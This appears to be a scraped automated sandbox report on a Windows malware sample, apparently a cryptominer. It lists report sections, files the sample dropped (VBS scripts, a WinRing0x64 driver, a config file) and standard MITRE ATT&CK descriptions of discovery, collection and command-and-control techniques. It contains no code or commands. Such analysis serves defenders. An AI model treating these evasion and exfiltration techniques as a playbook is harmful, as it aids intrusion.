Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\eWTBqYYAek\7349a13a3b_3.1.0

C:\ProgramData\eWTBqYYAek\cfg

C:\ProgramData\eWTBqYYAek\cfgi

C:\ProgramData\eWTBqYYAek\r.vbs

C:\ProgramData\eWTBqYYAek\svhproxy

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\AudioClip.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\services.exe.log

C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe

C:\Users\user\AppData\Roaming\01Atodo\Replace32640.vbs

C:\Users\user\AppData\Roaming\01Atodo\WinRing0x64.sys

C:\Users\user\AppData\Roaming\01Atodo\config.json

Windows Analysis Report
2rVBokoc2C

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre